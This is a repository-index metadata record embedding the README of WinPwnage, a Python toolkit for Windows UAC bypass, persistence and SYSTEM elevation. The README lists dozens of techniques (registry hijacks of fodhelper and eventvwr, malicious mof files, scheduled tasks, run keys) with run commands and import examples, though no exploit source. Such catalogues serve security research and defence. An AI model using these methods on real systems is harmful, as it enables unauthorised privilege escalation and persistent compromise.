{"id":13822245,"url":"https://github.com/rootm0s/WinPwnage","last_synced_at":"2025-05-16T15:33:34.181Z","repository":{"id":31711890,"uuid":"128671856","full_name":"rootm0s/WinPwnage","owner":"rootm0s","description":"UAC bypass, Elevate, Persistence methods","archived":false,"fork":false,"pushed_at":"2023-02-13T09:43:13.000Z","size":3245,"stargazers_count":2679,"open_issues_count":5,"forks_count":385,"subscribers_count":107,"default_branch":"master","last_synced_at":"2025-05-15T08:01:39.460Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rootm0s.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-04-08T18:51:50.000Z","updated_at":"2025-05-14T20:53:57.000Z","dependencies_parsed_at":"2023-02-14T19:35:37.096Z","dependency_job_id":null,"html_url":"https://github.com/rootm0s/WinPwnage","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rootm0s%2FWinPwnage","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rootm0s%2FWinPwnage/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rootm0s%2FWinPwnage/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rootm0s%2FWinPwnage/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rootm0s","download_url":"https://codeload.github.com/rootm0s/WinPwnage/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254556824,"owners_count":22091007,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T08:01:50.693Z","updated_at":"2025-05-16T15:33:33.887Z","avatar_url":"https://github.com/rootm0s.png","language":"Python","readme":"\u003cp align=\"center\"\u003e\r\n  \u003cimg src=\"https://i.imgur.com/wVXtzEb.png\"\u003e\r\n\u003c/p\u003e\r\n\r\n---\r\n\r\n[![build_status](https://travis-ci.com/rootm0s/WinPwnage.svg?branch=master)](https://travis-ci.com/rootm0s/WinPwnage)\r\n![python3_support](https://img.shields.io/badge/Python-3-blue.svg \"Python 3\")\r\n\r\n* [Build into single executable](#building)\r\n* [Scan for compatible methods](#scanning)\r\n* [Importing and usage as module](#importing)\r\n* [UAC-bypass techniques](#uac-bypass-techniques)\r\n* [Persistence techniques](#persistence-techniques)\r\n* [Elevation techniques](#elevation-techniques)\r\n\r\n## Disclaimer\r\nThis tool is provided for educational and research purposes only. The authors of this project are no way responsible for any misuse of this tool.\r\n\r\n## Building\r\nThis build works on Python \u003e= 3.6 and puts the .exe file into the __dist__ directory. Install pyinstaller using pip command:\r\n```batch\r\npip install pyinstaller\r\n```\r\nAnd run the following command:\r\n```batch\r\npyinstaller --onefile main.py\r\n```\r\n\r\n## Scanning\r\nCompares build number against 'Fixed In' build numbers and displays the results.\r\n```batch\r\nmain.py --scan uac\r\nmain.py --scan persist\r\nmain.py --scan elevate\r\n```\r\n\r\nExample results when scanning for possible UAC methods\r\n```\r\n Id:    Type:           Compatible:     Description:\r\n ----   ------          -----------     -------------\r\n 1      UAC bypass      No              UAC bypass using runas\r\n 2      UAC bypass      Yes             UAC bypass using fodhelper.exe\r\n 3      UAC bypass      Yes             UAC bypass using slui.exe\r\n 4      UAC bypass      Yes             UAC bypass using silentcleanup scheduled task\r\n 5      UAC bypass      No              UAC bypass using sdclt.exe (isolatedcommand)\r\n 6      UAC bypass      No              UAC bypass using sdclt.exe (App Paths)\r\n 7      UAC bypass      No              UAC bypass using perfmon.exe\r\n```\r\n\r\n## Importing\r\nBypass UAC using uacMethod2\r\n```python\r\nfrom winpwnage.functions.uac.uacMethod2 import uacMethod2\r\nuacMethod2([\"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/k\", \"whoami\"])\r\n```\r\n\r\nPersist on system using persistMethod4\r\n```python\r\nfrom winpwnage.functions.persist.persistMethod4 import persistMethod4\r\npersistMethod4([\"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/k\", \"whoami\"], add=True)\r\n\r\n# Removal\r\npersistMethod4([\"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/k\", \"whoami\"], add=False)\r\n```\r\n\r\nElevate from administrator to SYSTEM using elevateMethod1\r\n```python\r\nfrom winpwnage.functions.elevate.elevateMethod1 import elevateMethod1\r\nelevateMethod1([\"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/k\", \"whoami\"])\r\n```\r\n\r\n## UAC bypass techniques\r\n\u003cdetails\u003e\r\n\u003csummary\u003eFunctions (Expand/Collapse)\u003c/summary\u003e\r\n\r\n* UAC bypass using runas\r\n    * Id: 1\r\n    * Method: Windows API, this only works if UAC is set to never notify\r\n    * Syntax: `main.py --use uac --id 1 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 7600\r\n\t* Fixed in:\tn/a\r\n* UAC bypass using fodhelper.exe\r\n    * Id: 2\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 2 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 10240\r\n\t* Fixed in: n/a\r\n* UAC bypass using slui.exe\r\n    * Id: 3\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 3 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 9600\r\n\t* Fixed in: n/a\r\n* UAC bypass using silentcleanup scheduled task\r\n    * Id: 4\r\n    * Method: Registry key (Environment) manipulation, this bypasses UAC's Always Notify.\r\n    * Syntax: `main.py --use uac --id 4 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 9600\r\n\t* Fixed in: n/a\r\n* UAC bypass using sdclt.exe (isolatedcommand)\r\n    * Id: 5\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 5 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 10240\r\n\t* Fixed in: 17025\r\n* UAC bypass using sdclt.exe (App Paths)\r\n    * Id: 6\r\n    * Method: Registry key (App Paths) manipulation\r\n    * Syntax: `main.py --use uac --id 6 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 10240\r\n\t* Fixed in: 16215\r\n* UAC bypass using perfmon.exe\r\n    * Id: 7\r\n    * Method: Registry key (Volatile Environment) manipulation\r\n    * Syntax: `main.py --use uac --id 7 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 7600\r\n\t* Fixed in: 16299\r\n* UAC bypass using eventvwr.exe\r\n    * Id: 8\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 8 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 7600\r\n\t* Fixed in: 15031\r\n* UAC bypass using compmgmtlauncher.exe\r\n    * Id: 9\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 9 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 7600\r\n\t* Fixed in: 15031\t\r\n* UAC bypass using computerdefaults.exe\r\n    * Id: 10\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 10 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 10240\r\n\t* Fixed in: n/a\r\n* UAC bypass using token manipulation\r\n    * Id: 11\r\n    * Method: Token manipulation\r\n    * Syntax: `main.py --use uac --id 11 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 7600\r\n\t* Fixed in: 17686\r\n* UAC bypass using sdclt.exe (Folder)\r\n    * Id: 12\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 12 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 14393\r\n\t* Fixed in: n/a\r\n* UAC bypass using cmstp.exe\r\n    * Id: 13\r\n    * Method: Malicious ini file\r\n    * Syntax: `main.py --use uac --id 13 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 7600\r\n\t* Fixed in: n/a\r\n* UAC bypass using wsreset.exe\r\n    * Id: 14\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 14 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 17134\r\n\t* Fixed in: n/a\r\n* UAC bypass using slui.exe and changepk.exe\r\n    * Id: 15\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use uac --id 15 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Works from: 17763\r\n\t* Fixed in: n/a\r\n\u003c/details\u003e\r\n\r\n## Persistence techniques\r\n\u003cdetails\u003e\r\n\u003csummary\u003eFunctions (Expand/Collapse)\u003c/summary\u003e\r\n\r\n* Persistence using mofcomp.exe (SYSTEM privileges)\r\n    * Id: 1\r\n    * Method: Malicious mof file using EventFilter EventConsumer and binding\r\n    * Syntax: `main.py --use persist --id 1 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 1 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using schtasks.exe (SYSTEM privileges)\r\n    * Id: 2\r\n    * Method: Malicious scheduled task\r\n    * Syntax: `main.py --use persist --id 2 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 2 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using image file execution option and magnifier.exe\r\n    * Id: 3\r\n    * Method: Image File Execution Options debugger and accessibility application\r\n    * Syntax: `main.py --use persist --id 3 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 3 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\t\r\n* Persistence using userinit key\r\n    * Id: 4\r\n    * Method: Registry key (UserInit) manipulation\r\n    * Syntax: `main.py --use persist --id 4 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 4 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using HKCU run key\r\n    * Id: 5\r\n    * Method: Registry key (HKCU Run) manipulation\r\n    * Syntax: `main.py --use persist --id 5 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 5 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: n/a\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using HKLM run key\r\n    * Id: 6\r\n    * Method: Registry key (HKLM Run) manipulation\r\n    * Syntax: `main.py --use persist --id 6 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 6 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using wmic.exe (SYSTEM privileges)\r\n    * Id: 7\r\n    * Method: Malicious mof file using EventFilter EventConsumer and binding\r\n    * Syntax: `main.py --use persist --id 7 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 7 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using startup files\r\n    * Id: 8\r\n    * Method: Malicious lnk file in startup directory\r\n    * Syntax: `main.py --use persist --id 8 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 8 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: n/a\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using cortana windows app\r\n    * Id: 9\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use persist --id 9 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 9 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: n/a\r\n    * Works from: 14393\r\n    * Fixed in: n/a\r\n* Persistence using people windows app\r\n    * Id: 10\r\n    * Method: Registry key (Class) manipulation\r\n    * Syntax: `main.py --use persist --id 10 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 10 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: n/a\r\n    * Works from: 14393\r\n    * Fixed in: n/a\r\n* Persistence using bitsadmin.exe\r\n    * Id: 11\r\n    * Method: Malicious bitsadmin job\r\n    * Syntax: `main.py --use persist --id 11 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 11 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n* Persistence using Windows Service (SYSTEM privileges)\r\n    * Id: 12\r\n    * Method: Malicious Windows Service\r\n    * Syntax: `main.py --use persist --id 12 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n    * Syntax for removing: `main.py --use persist --id 12 --payload c:\\\\windows\\\\system32\\\\cmd.exe --remove`\r\n    * Requires: Administrator rights\r\n    * Works from: 7600\r\n    * Fixed in: n/a\r\n\u003c/details\u003e\r\n\r\n## Elevation techniques\r\n\u003cdetails\u003e\r\n\u003csummary\u003eFunctions (Expand/Collapse)\u003c/summary\u003e\r\n\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using handle inheritance\r\n    * Id: 1\r\n    * Method: Handle inheritance\r\n    * Syntax: `main.py --use elevate --id 1 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Requires: Administrator rights\r\n\t* Works from: 7600\r\n\t* Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using token impersonation\r\n    * Id: 2\r\n    * Method: Token impersonation\r\n    * Syntax: `main.py --use elevate --id 2 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Requires: Administrator rights\r\n\t* Works from: 7600\r\n\t* Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using named pipe impersonation\r\n    * Id: 3\r\n    * Method: Named pipe impersonation\r\n    * Syntax: `main.py --use elevate --id 3 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Requires: Administrator rights\r\n\t* Works from: 7600\r\n\t* Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using schtasks.exe (non interactive)\r\n    * Id: 4\r\n    * Method: Malicious scheduled task that gets deleted once used\r\n    * Syntax: `main.py --use elevate --id 4 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Requires: Administrator rights\r\n\t* Works from: 7600\r\n\t* Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using wmic.exe (non interactive)\r\n    * Id: 5\r\n    * Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used\r\n    * Syntax: `main.py --use elevate --id 5 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Requires: Administrator rights\r\n\t* Works from: 7600\r\n\t* Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using Windows Service (non interactive)\r\n    * Id: 6\r\n    * Method: Malicious Windows Service that gets deleted once used\r\n    * Syntax: `main.py --use elevate --id 6 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Requires: Administrator rights\r\n\t* Works from: 7600\r\n\t* Fixed in: n/a\r\n* Elevate from administrator to NT AUTHORITY SYSTEM using mofcomp.exe (non interactive)\r\n    * Id: 7\r\n    * Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used\r\n    * Syntax: `main.py --use elevate --id 7 --payload c:\\\\windows\\\\system32\\\\cmd.exe`\r\n\t* Requires: Administrator rights\r\n\t* Works from: 7600\r\n\t* Fixed in: n/a\r\n\u003c/details\u003e\r\n\r\n## Read\r\n* https://wikileaks.org/ciav7p1/cms/page_2621770.html\r\n* https://wikileaks.org/ciav7p1/cms/page_2621767.html\r\n* https://wikileaks.org/ciav7p1/cms/page_2621760.html\r\n* https://msdn.microsoft.com/en-us/library/windows/desktop/bb736357(v=vs.85).aspx\r\n* https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\r\n* https://github.com/winscripting/UAC-bypass/\r\n* https://www.greyhathacker.net/?p=796\r\n* https://github.com/hfiref0x/UACME\r\n* https://bytecode77.com/hacking/exploits/uac-bypass/performance-monitor-privilege-escalation\r\n* https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation\r\n* https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20workshops/DEFCON-25-Workshop-Ruben-Boobeb-UAC-0day-All-Day.pdf\r\n* https://lolbas-project.github.io\r\n","funding_links":[],"categories":["Python","Python (1887)","others","Operating Systems","Windows"],"sub_categories":["Windows","Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootm0s%2FWinPwnage","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frootm0s%2FWinPwnage","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootm0s%2FWinPwnage/lists"}